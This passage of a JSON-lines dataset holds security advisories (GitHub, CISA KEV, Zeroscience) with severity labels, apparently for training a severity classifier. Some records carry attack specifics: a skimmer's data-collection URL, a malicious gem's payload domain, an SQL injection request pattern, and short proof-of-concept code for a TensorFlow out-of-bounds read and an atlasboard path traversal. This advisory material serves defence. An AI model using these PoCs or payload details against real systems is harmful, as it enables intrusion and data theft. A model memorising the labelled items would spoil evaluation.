VMware vCenter Server\n\nVMware vSphere Client contains an improper input validation vulnerability in the Virtual SAN Health Check plug-in, which is enabled by default in vCenter Server, which allows for remote code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-20, CWE-470, CWE-918\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "f3f0a8e5a79a5224deac", "text": "Limny 3.0.1 (login.php) Remote URI Based Cross-Site Scripting Vulnerability", "text_raw": "Limny 3.0.1 (login.php) Remote URI Based Cross-Site Scripting Vulnerability\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2012-01-04", "split": "train"} -{"id": "5c98a93ed7fc2fedc64c", "text": "active-support impersonates 'activesupport' gem\n\nThe `active-support` ruby gem gem is malware and duplicates the official `activesupport` (no hyphen) gem, but adds a compiled extension. The extension attempts to resolve a base64 encoded domain (29faea63.planfhntage.de), downloads a payload, and executes.\n\nThis trojan horse gem could allow a remote attacker to execute arbitrary code on the system, caused by containing a malicious backdoor. An attacker could exploit this vulnerability to execute arbitrary code on the system. No version of this gem should be considered safe.", "text_raw": "active-support impersonates 'activesupport' gem\n\n[Severity: CRITICAL]\n\nThe `active-support` ruby gem gem is malware and duplicates the official `activesupport` (no hyphen) gem, but adds a compiled extension. The extension attempts to resolve a base64 encoded domain (29faea63.planfhntage.de), downloads a payload, and executes.\n \nThis trojan horse gem could allow a remote attacker to execute arbitrary code on the system, caused by containing a malicious backdoor. An attacker could exploit this vulnerability to execute arbitrary code on the system. No version of this gem should be considered safe.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2018-08-13", "split": "train"} -{"id": "39cc065837d9c394bb33", "text": "Private files publicly accessible with Cloud Storage providers\n\n### Impact\n\nPrivate files publicly accessible with Cloud Storage providers when the hashed URL is known\n\n### Patches\n\nWe recommend first changing your configuration to set the correct visibility according to the documentation. The visibility must be at the same level as `type`.\n\nWhen the Storage is saved on Amazon AWS we recommending disabling public access to the bucket containing the private files: https://docs.aws.amazon.com/AmazonS3/latest/userguide/access-control-block-public-access.html\n\nOtherwise, update to Shopware 6.4.1.1 or install or update the Security plugin (https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659) and run the command `./bin/console s3:set-visibility` to correct your cloud file visibilities", "text_raw": "Private files publicly accessible with Cloud Storage providers\n\n[Severity: HIGH]\n\n### Impact\n\nPrivate files publicly accessible with Cloud Storage providers when the hashed URL is known\n\n### Patches\n\nWe recommend first changing your configuration to set the correct visibility according to the documentation. The visibility must be at the same level as `type`.\n\nWhen the Storage is saved on Amazon AWS we recommending disabling public access to the bucket containing the private files: https://docs.aws.amazon.com/AmazonS3/latest/userguide/access-control-block-public-access.html\n\nOtherwise, update to Shopware 6.4.1.1 or install or update the Security plugin (https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659) and run the command `./bin/console s3:set-visibility` to correct your cloud file visibilities \n", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-06-28", "split": "train"} -{"id": "9f82862fadf73907d564", "text": "webgrind 1.0 (dataFile) Remote Reflected XSS Vulnerability", "text_raw": "webgrind 1.0 (dataFile) Remote Reflected XSS Vulnerability\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2012-02-17", "split": "train"} -{"id": "88efa681cbffcafb8729", "text": "Malicious Package in cage-js\n\nAll versions of `cage-js` contains malicious code. The malware downloads and runs a script from a remote server as a postinstall script.\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "text_raw": "Malicious Package in cage-js\n\n[Severity: CRITICAL]\n\nAll versions of `cage-js` contains malicious code. The malware downloads and runs a script from a remote server as a postinstall script.\n\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "6601560ca2b86b979b4f", "text": "git-fastclone permits arbitrary shell command execution from .gitmodules\n\ngit-fastclone before 1.0.1 permits arbitrary shell command execution from .gitmodules. If an attacker can instruct a user to run a recursive clone from a repository they control, they can get a client to run an arbitrary shell command. Alternately, if an attacker can MITM an unencrypted git clone, they could exploit this. The ext command will be run if the repository is recursively cloned or if submodules are updated. This attack works when cloning both local and remote repositories.", "text_raw": "git-fastclone permits arbitrary shell command execution from .gitmodules\n\n[Severity: HIGH]\n\ngit-fastclone before 1.0.1 permits arbitrary shell command execution from .gitmodules. If an attacker can instruct a user to run a recursive clone from a repository they control, they can get a client to run an arbitrary shell command. Alternately, if an attacker can MITM an unencrypted git clone, they could exploit this. The ext command will be run if the repository is recursively cloned or if submodules are updated. This attack works when cloning both local and remote repositories.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-08-15", "split": "train"} -{"id": "d78563a7eeb024b0ac79", "text": "npm Token Leak in npm\n\nAffected versions of the `npm` package include the bearer token of the logged in user in every request made by the CLI, even if the request is not directed towards the user's active registry.\n\nAn attacker could create an HTTP server to collect tokens, and by various means including but not limited to install scripts, cause the npm CLI to make a request to that server, which would compromise the user's token.\n\nThis compromised token could be used to do anything that the user could do, including publishing new packages.\n\n## Recommendation\n\n1. Update npm with `npm install npm@latest -g`\n2. [Revoke your Tokens](https://www.npmjs.com/settings/tokens)\n3. Enable [Two-Factor Authentication](https://docs.npmjs.com/getting-started/using-two-factor-authentication)", "text_raw": "npm Token Leak in npm\n\n[Severity: HIGH]\n\nAffected versions of the `npm` package include the bearer token of the logged in user in every request made by the CLI, even if the request is not directed towards the user's active registry. \n\nAn attacker could create an HTTP server to collect tokens, and by various means including but not limited to install scripts, cause the npm CLI to make a request to that server, which would compromise the user's token.\n\nThis compromised token could be used to do anything that the user could do, including publishing new packages.\n\n\n\n\n## Recommendation\n\n1. Update npm with `npm install npm@latest -g`\n2. [Revoke your Tokens](https://www.npmjs.com/settings/tokens)\n3. Enable [Two-Factor Authentication](https://docs.npmjs.com/getting-started/using-two-factor-authentication)", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-07-31", "split": "train"} -{"id": "bf9de0d35389908bf8f3", "text": "An issue in Atomix v3.1.5 allows a malicious Atomix node to remove states of ONOS storage via abuse of primitive operations.", "text_raw": "An issue in Atomix v3.1.5 allows a malicious Atomix node to remove states of ONOS storage via abuse of primitive operations.\n\n[Severity: HIGH]", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-12-17", "split": "train"} -{"id": "a62913ba4272cc8cf3bc", "text": "SQL Injection in LibreNMS\n\nAn issue was discovered in LibreNMS 1.50.1. A SQL injection flaw was identified in the ajax_rulesuggest.php file where the term parameter is used insecurely in a database query for showing columns of a table, as demonstrated by an ajax_rulesuggest.php?debug=1&term= request.", "text_raw": "SQL Injection in LibreNMS\n\n[Severity: HIGH]\n\nAn issue was discovered in LibreNMS 1.50.1. A SQL injection flaw was identified in the ajax_rulesuggest.php file where the term parameter is used insecurely in a database query for showing columns of a table, as demonstrated by an ajax_rulesuggest.php?debug=1&term= request.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-10-11", "split": "train"} -{"id": "552a6c28e1411b6220d5", "text": "Deserialization of untrusted data in Jackson Databind\n\nFasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to oadd.org.apache.xalan.lib.sql.JNDIConnectionPool (aka apache/drill).", "text_raw": "Deserialization of untrusted data in Jackson Databind\n\n[Severity: HIGH]\n\nFasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to oadd.org.apache.xalan.lib.sql.JNDIConnectionPool (aka apache/drill).", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-06-18", "split": "train"} -{"id": "39635181d6aedad4f856", "text": "Inductive Automation Ignition 7.8.1 Remote Leakage Of Shared Buffers", "text_raw": "Inductive Automation Ignition 7.8.1 Remote Leakage Of Shared Buffers\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2016-02-16", "split": "train"} -{"id": "3d04ca4441d03575799a", "text": "Improper sanitization of target names\n\n### Impact\nThe tough library, prior to 0.12.0, does not properly sanitize target names when caching a repository, or when saving specific targets to an output directory. When targets are cached or saved, files could be overwritten with arbitrary content anywhere on the system.\n\nAWS would like to thank https://github.com/jku for reporting this issue.\n\n### Patches\nA fix is available in version 0.12.0.\n\n### Workarounds\nNo workarounds to this issue are known.", "text_raw": "Improper sanitization of target names\n\n[Severity: HIGH]\n\n### Impact\nThe tough library, prior to 0.12.0, does not properly sanitize target names when caching a repository, or when saving specific targets to an output directory. When targets are cached or saved, files could be overwritten with arbitrary content anywhere on the system.\n\nAWS would like to thank https://github.com/jku for reporting this issue.\n\n### Patches\nA fix is available in version 0.12.0.\n\n### Workarounds\nNo workarounds to this issue are known.\n", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-10-19", "split": "train"} -{"id": "80131c9df2f2eb3c9176", "text": "Unauthenticated SQL Injection in Cachet\n\n### Impact\nIn Cachet versions through 2.3.18, there is a SQL injection which is in the `SearchableTrait#scopeSearch()`. Attackers without authentication can utilize this vulnerability to exfiltrate sensitive data from the database such as administrator's password and session.\n\n### Patches\n\nThe original repository of [https://github.com/CachetHQ/Cachet](https://github.com/CachetHQ/Cachet) is not active, the stable version 2.3.18 and it's developing 2.4 branch is affected.\n\nUpdate to version 2.5 or later in the [https://github.com/fiveai/Cachet fork](https://github.com/fiveai/Cachet) to fix this vulnerability.", "text_raw": "Unauthenticated SQL Injection in Cachet\n\n[Severity: HIGH]\n\n### Impact\nIn Cachet versions through 2.3.18, there is a SQL injection which is in the `SearchableTrait#scopeSearch()`. Attackers without authentication can utilize this vulnerability to exfiltrate sensitive data from the database such as administrator's password and session.\n\n### Patches\n\nThe original repository of [https://github.com/CachetHQ/Cachet](https://github.com/CachetHQ/Cachet) is not active, the stable version 2.3.18 and it's developing 2.4 branch is affected. \n\nUpdate to version 2.5 or later in the [https://github.com/fiveai/Cachet fork](https://github.com/fiveai/Cachet) to fix this vulnerability.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-30", "split": "train"} -{"id": "b20636801dd5fde9924a", "text": "mistune Cross-site scripting (XSS) vulnerability\n\nCross-site scripting (XSS) vulnerability in the _keyify function in mistune.py in Mistune before 0.8.1 allows remote attackers to inject arbitrary web script or HTML by leveraging failure to escape the \"key\" argument.", "text_raw": "mistune Cross-site scripting (XSS) vulnerability\n\n[Severity: MEDIUM]\n\nCross-site scripting (XSS) vulnerability in the _keyify function in mistune.py in Mistune before 0.8.1 allows remote attackers to inject arbitrary web script or HTML by leveraging failure to escape the \"key\" argument.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2019-01-04", "split": "train"} -{"id": "3547fb132ee5d1587ea3", "text": "XML External Entity (XXE) Injection in JDOM\n\nAn XXE issue in SAXBuilder in JDOM through 2.0.6 allows attackers to cause a denial of service via a crafted HTTP request. As a workaround, to avoid external entities being expanded, one can call `builder.setExpandEntities(false)` and they won't be expanded.", "text_raw": "XML External Entity (XXE) Injection in JDOM\n\n[Severity: HIGH]\n\nAn XXE issue in SAXBuilder in JDOM through 2.0.6 allows attackers to cause a denial of service via a crafted HTTP request. As a workaround, to avoid external entities being expanded, one can call `builder.setExpandEntities(false)` and they won't be expanded.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-07-27", "split": "train"} -{"id": "4b238d0f14590e149ee8", "text": "Cross-site scripting in bluemonday\n\nbluemonday before 1.0.5 allows XSS because certain Go lowercasing converts an uppercase Cyrillic character, defeating a protection mechanism against the \"script\" string.", "text_raw": "Cross-site scripting in bluemonday\n\n[Severity: MEDIUM]\n\nbluemonday before 1.0.5 allows XSS because certain Go lowercasing converts an uppercase Cyrillic character, defeating a protection mechanism against the \"script\" string.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-05-18", "split": "train"} -{"id": "e81d64330f7882b6f017", "text": "Google Chromium Race Condition Vulnerability\n\nAffected: Google Chromium\n\nGoogle Chromium contains a race condition vulnerability that allows a remote attacker to potentially exploit heap corruption via a crafted HTML page. This vulnerability could affect multiple web browsers that utilize Chromium, including, but not limited to, Google Chrome, Microsoft Edge, and Opera.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-122, CWE-362\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Google Chromium Race Condition Vulnerability\n\nAffected: Google Chromium\n\nGoogle Chromium contains a race condition vulnerability that allows a remote attacker to potentially exploit heap corruption via a crafted HTML page. This vulnerability could affect multiple web browsers that utilize Chromium, including, but not limited to, Google Chrome, Microsoft Edge, and Opera.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-122, CWE-362\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "339d84b3f63474683fdf", "text": "Zoho ManageEngine ServiceDesk Plus (SDP) File Upload Vulnerability\n\nAffected: Zoho ManageEngine\n\nZoho ManageEngine ServiceDesk Plus (SDP) contains an unspecified vulnerability that allows remote users to upload files via login page customization.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-434\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Zoho ManageEngine ServiceDesk Plus (SDP) File Upload Vulnerability\n\nAffected: Zoho ManageEngine\n\nZoho ManageEngine ServiceDesk Plus (SDP) contains an unspecified vulnerability that allows remote users to upload files via login page customization.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-434\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "3b93c701fc29f0f1358a", "text": "Insecure Deserialization of untrusted data in rmccue/requests\n\n### Impact\nUnserialization of untrusted data.\n\n### Patches\nThe issue has been patched and users of `Requests` 1.6.0, 1.6.1 and 1.7.0 should update to version 1.8.0.\n\n### References\nPublications about the vulnerability:\n* https://dannewitz.ninja/posts/php-unserialize-object-injection-yet-another-stars-rating-wordpress\n* https://github.com/ambionics/phpggc/issues/52\n* https://blog.detectify.com/2019/07/23/improving-wordpress-plugin-security/\n* https://i.blackhat.com/us-18/Thu-August-9/us-18-Thomas-Its-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf\n* https://cdn2.hubspot.net/hubfs/3853213/us-18-Thomas-It%27s-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-....pdf\n* https://2018.zeronights.ru/wp-content/uploads/materials/9%20ZN2018%20WV%20-%20PHP%20unserialize.pdf\n* https://medium.com/@knownsec404team/extend-the-attack-surface-of-php-deserialization-vulnerability-via-phar-d6455c6a1066#3c0f\n\nOriginally fixed in WordPress 5.5.2:\n* https://github.com/WordPress/wordpress-develop/commit/add6bedf3a53b647d0ebda2970057912d3cd79d3\n* https://wordpress.org/news/2020/10/wordpress-5-5-2-security-and-maintenance-release/\n\nRelated Security Advisories:\n* https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-28032\n* https://nvd.nist.gov/vuln/detail/CVE-2020-28032\n\nNotification to the Requests repo including a fix in:\n* https://github.com/rmccue/Requests/pull/421 and\n* https://github.com/rmccue/Requests/pull/422\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [Request](https://github.com/WordPress/Requests/)", "text_raw": "Insecure Deserialization of untrusted data in rmccue/requests\n\n[Severity: CRITICAL]\n\n### Impact\nUnserialization of untrusted data.\n\n### Patches\nThe issue has been patched and users of `Requests` 1.6.0, 1.6.1 and 1.7.0 should update to version 1.8.0.\n\n### References\nPublications about the vulnerability:\n* https://dannewitz.ninja/posts/php-unserialize-object-injection-yet-another-stars-rating-wordpress\n* https://github.com/ambionics/phpggc/issues/52\n* https://blog.detectify.com/2019/07/23/improving-wordpress-plugin-security/\n* https://i.blackhat.com/us-18/Thu-August-9/us-18-Thomas-Its-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf\n* https://cdn2.hubspot.net/hubfs/3853213/us-18-Thomas-It%27s-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-....pdf\n* https://2018.zeronights.ru/wp-content/uploads/materials/9%20ZN2018%20WV%20-%20PHP%20unserialize.pdf\n* https://medium.com/@knownsec404team/extend-the-attack-surface-of-php-deserialization-vulnerability-via-phar-d6455c6a1066#3c0f\n\nOriginally fixed in WordPress 5.5.2:\n* https://github.com/WordPress/wordpress-develop/commit/add6bedf3a53b647d0ebda2970057912d3cd79d3\n* https://wordpress.org/news/2020/10/wordpress-5-5-2-security-and-maintenance-release/\n\nRelated Security Advisories:\n* https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-28032\n* https://nvd.nist.gov/vuln/detail/CVE-2020-28032\n\nNotification to the Requests repo including a fix in:\n* https://github.com/rmccue/Requests/pull/421 and\n* https://github.com/rmccue/Requests/pull/422\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [Request](https://github.com/WordPress/Requests/)", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-04-29", "split": "train"} -{"id": "f961a9f123ecf081171e", "text": "Use of Uninitialized Resource in alg_ds\n\nAn issue was discovered in the alg_ds crate through 2020-08-25 for Rust. `Matrix::new()` internally calls `Matrix::fill_with()` which uses `*ptr = value` pattern to initialize the buffer. This pattern assumes that there is an initialized struct at the address and drops it, which results in dropping of uninitialized struct.", "text_raw": "Use of Uninitialized Resource in alg_ds\n\n[Severity: CRITICAL]\n\nAn issue was discovered in the alg_ds crate through 2020-08-25 for Rust. `Matrix::new()` internally calls `Matrix::fill_with()` which uses `*ptr = value` pattern to initialize the buffer. This pattern assumes that there is an initialized struct at the address and drops it, which results in dropping of uninitialized struct.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "253e6849146de8caf984", "text": "Private key leak in Apache CXF\n\nApache CXF ships with a OpenId Connect JWK Keys service, which allows a client to obtain the public keys in JWK format, which can then be used to verify the signature of tokens issued by the service. Typically, the service obtains the public key from a local keystore (JKS/PKCS12) by specifing the path of the keystore and the alias of the keystore entry. This case is not vulnerable. However it is also possible to obtain the keys from a JWK keystore file, by setting the configuration parameter `rs.security.keystore.type` to `jwk`. For this case all keys are returned in this file "as is", including all private key and secret key credentials. This is an obvious security risk if the user has configured the signature keystore file with private or secret key credentials. From CXF 3.3.5 and 3.2.12, it is mandatory to specify an alias corresponding to the id of the key in the JWK file, and only this key is returned. In addition, any private key information is omitted by default. `oct` keys, which contain secret keys, are not returned at all.", "text_raw": "Private key leak in Apache CXF\n\n[Severity: HIGH]\n\nApache CXF ships with a OpenId Connect JWK Keys service, which allows a client to obtain the public keys in JWK format, which can then be used to verify the signature of tokens issued by the service. Typically, the service obtains the public key from a local keystore (JKS/PKCS12) by specifing the path of the keystore and the alias of the keystore entry. This case is not vulnerable. However it is also possible to obtain the keys from a JWK keystore file, by setting the configuration parameter `rs.security.keystore.type` to `jwk`. For this case all keys are returned in this file "as is", including all private key and secret key credentials. This is an obvious security risk if the user has configured the signature keystore file with private or secret key credentials. From CXF 3.3.5 and 3.2.12, it is mandatory to specify an alias corresponding to the id of the key in the JWK file, and only this key is returned. In addition, any private key information is omitted by default. `oct` keys, which contain secret keys, are not returned at all.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-05-22", "split": "train"} -{"id": "07eaa084e0c41ea3f9c9", "text": "Microsoft Internet Explorer Scripting Engine Memory Corruption Vulnerability\n\nAffected: Microsoft Internet Explorer\n\nMicrosoft Internet Explorer contains a memory corruption vulnerability which can allow for remote code execution in the context of the current user.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-787\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Microsoft Internet Explorer Scripting Engine Memory Corruption Vulnerability\n\nAffected: Microsoft Internet Explorer\n\nMicrosoft Internet Explorer contains a memory corruption vulnerability which can allow for remote code execution in the context of the current user.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-787\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "5e2d661437b324e6dc2c", "text": "Heap out of bounds read in `RequantizationRange`\n\n### Impact\nThe implementation of `tf.raw_ops.MaxPoolGradWithArgmax` can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs:\n\n```python\nimport tensorflow as tf\n\ninput = tf.constant([1], shape=[1], dtype=tf.qint32) \ninput_max = tf.constant([], dtype=tf.float32)\ninput_min = tf.constant([], dtype=tf.float32)\n\ntf.raw_ops.RequantizationRange(input=input, input_min=input_min, input_max=input_max)\n```\n\nThe [implementation](https://github.com/tensorflow/tensorflow/blob/ac328eaa3870491ababc147822cd04e91a790643/tensorflow/core/kernels/requantization_range_op.cc#L49-L50) assumes that the `input_min` and `input_max` tensors have at least one element, as it accesses the first element in two arrays:\n\n```cc\nconst float input_min_float = ctx->input(1).flat()(0);\nconst float input_max_float = ctx->input(2).flat()(0);\n```\n\nIf the tensors are empty, `.flat()` is an empty object, backed by an empty array. Hence, accesing even the 0th element is a read outside the bounds.\n\n### Patches\nWe have patched the issue in GitHub commit [ef0c008ee84bad91ec6725ddc42091e19a30cf0e](https://github.com/tensorflow/tensorflow/commit/ef0c008ee84bad91ec6725ddc42091e19a30cf0e).\n\nThe fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.", "text_raw": "Heap out of bounds read in `RequantizationRange`\n\n[Severity: LOW]\n\n### Impact\nThe implementation of `tf.raw_ops.MaxPoolGradWithArgmax` can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs:\n\n```python\nimport tensorflow as tf\n\ninput = tf.constant([1], shape=[1], dtype=tf.qint32) \ninput_max = tf.constant([], dtype=tf.float32)\ninput_min = tf.constant([], dtype=tf.float32)\n\ntf.raw_ops.RequantizationRange(input=input, input_min=input_min, input_max=input_max)\n```\n\nThe [implementation](https://github.com/tensorflow/tensorflow/blob/ac328eaa3870491ababc147822cd04e91a790643/tensorflow/core/kernels/requantization_range_op.cc#L49-L50) assumes that the `input_min` and `input_max` tensors have at least one element, as it accesses the first element in two arrays:\n\n```cc\nconst float input_min_float = ctx->input(1).flat()(0);\nconst float input_max_float = ctx->input(2).flat()(0);\n```\n\nIf the tensors are empty, `.flat()` is an empty object, backed by an empty array. Hence, accesing even the 0th element is a read outside the bounds.\n\n### Patches\nWe have patched the issue in GitHub commit [ef0c008ee84bad91ec6725ddc42091e19a30cf0e](https://github.com/tensorflow/tensorflow/commit/ef0c008ee84bad91ec6725ddc42091e19a30cf0e).\n\nThe fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2021-05-21", "split": "train"} -{"id": "94d0c1b5f7bfadd13804", "text": "Command Injection in Simiki\n\nCommand Injection in Simiki v1.6.2.1 and prior allows remote attackers to execute arbitrary system commands via line 64 of the component 'simiki/blob/master/simiki/config.py'.", "text_raw": "Command Injection in Simiki\n\n[Severity: CRITICAL]\n\nCommand Injection in Simiki v1.6.2.1 and prior allows remote attackers to execute arbitrary system commands via line 64 of the component 'simiki/blob/master/simiki/config.py'.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-09-01", "split": "train"} -{"id": "c00e3ce6edd99f870577", "text": "Exposure of sensitive information in concrete5/core\n\nIn Concrete CMS (formerly concrete 5) below 8.5.7, IDOR Allows Unauthenticated User to Access Restricted Files If Allowed to Add Message to a Conversation.To remediate this, a check was added to verify a user has permissions to view files before attaching the files to a message in \"add / edit message”.", "text_raw": "Exposure of sensitive information in concrete5/core\n\n[Severity: MEDIUM]\n\nIn Concrete CMS (formerly concrete 5) below 8.5.7, IDOR Allows Unauthenticated User to Access Restricted Files If Allowed to Add Message to a Conversation.To remediate this, a check was added to verify a user has permissions to view files before attaching the files to a message in \"add / edit message”.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-11-23", "split": "train"} -{"id": "7124d2a7ee0e4b2a1973", "text": "**Withdrawn:** Duplicate of GHSA-qcxh-w3j9-58qr", "text_raw": "Moderate severity vulnerability that affects org.apache.tomcat.embed:tomcat-embed-core\n\n[Severity: MEDIUM]\n\n**Withdrawn:** Duplicate of GHSA-qcxh-w3j9-58qr", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2019-04-18", "split": "train"} -{"id": "b25a6f9e3c2defcca997", "text": "Malicious Package in modlibrary\n\nVersion 0.1.1 of `modlibrary` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`\n\n## Recommendation\n\nIf version 0.1.1 of this module is found installed you will want to replace it with a version before or after 0.1.1. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.\n\nUsers may consider downgrading to version 0.1.0", "text_raw": "Malicious Package in modlibrary\n\n[Severity: CRITICAL]\n\nVersion 0.1.1 of `modlibrary` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`\n\n\n\n## Recommendation\n\nIf version 0.1.1 of this module is found installed you will want to replace it with a version before or after 0.1.1. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.\n\nUsers may consider downgrading to version 0.1.0", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-01", "split": "train"} -{"id": "37b6356ce61a108c9594", "text": "IPUX Cube Type CS303C IP Camera (UltraMJCamX.ocx) ActiveX Stack Buffer Overflow", "text_raw": "IPUX Cube Type CS303C IP Camera (UltraMJCamX.ocx) ActiveX Stack Buffer Overflow\n\nSeverity: high", "severity": "high", "severity_label": 2, "source": "zeroscience", "timestamp": "2014-12-02", "split": "train"} -{"id": "fe2f8f49f06757758aae", "text": "Out-of-bounds reads in Pillow\n\nPillow before 7.1.0 has multiple out-of-bounds reads in `libImaging/FliDecode.c`.", "text_raw": "Out-of-bounds reads in Pillow\n\n[Severity: HIGH]\n\nPillow before 7.1.0 has multiple out-of-bounds reads in `libImaging/FliDecode.c`.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-07-27", "split": "train"} -{"id": "0ee1e6f7fc380638678c", "text": "jackson-databind polymorphic typing issue\n\nA Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 prior to 2.9.10.1, 2.8.11.5, and 2.6.7.3. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the apache-log4j-extra (version 1.2.x) jar in the classpath, and an attacker can provide a JNDI service to access, it is possible to make the service execute a malicious payload.", "text_raw": "jackson-databind polymorphic typing issue\n\n[Severity: CRITICAL]\n\nA Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 prior to 2.9.10.1, 2.8.11.5, and 2.6.7.3. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the apache-log4j-extra (version 1.2.x) jar in the classpath, and an attacker can provide a JNDI service to access, it is possible to make the service execute a malicious payload. ", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2019-11-13", "split": "train"} -{"id": "915b14a0a7e860d4aa37", "text": "Path traversal in atlasboard\n\nThe renderWidgetResource resource in Atlasian Atlasboard before version 1.1.9 allows remote attackers to read arbitrary files via a path traversal vulnerability.\n\n### PoC\n```javascript\nconst widget = require(\\\"atlasboard/lib/webapp/routes/widget\\\");\n\n// Mock req and res\nconst req = {};\nconst res = {\n sendFile: (filePath) => {\n // Read and return file contents synchronously\n const data = fs.readFileSync(filePath, \\\"utf8\\\");\n console.log(\\\"Contents of /flag.txt:\\\");\n console.log(data);\n },\n status: function (code) {\n this.statusCode = code;\n return this;\n },\n send: function (msg) {\n throw new Error(`Server responded with status ${this.statusCode}: ${msg}`);\n },\n};\n\n// localPackagesPath set to root to allow traversal to /flag.txt\nconst localPackagesPath = \\\"/\\\";\n\n// resource string with path traversal to escape localPackagesPath and widgets directory\nconst resource = \\\"../../flag.txt\\\";\n\n// Call vulnerable function\nawait widget.renderWidgetResource(localPackagesPath, resource, req, res);\n```", "text_raw": "Path traversal in atlasboard\n\n[Severity: HIGH]\n\nThe renderWidgetResource resource in 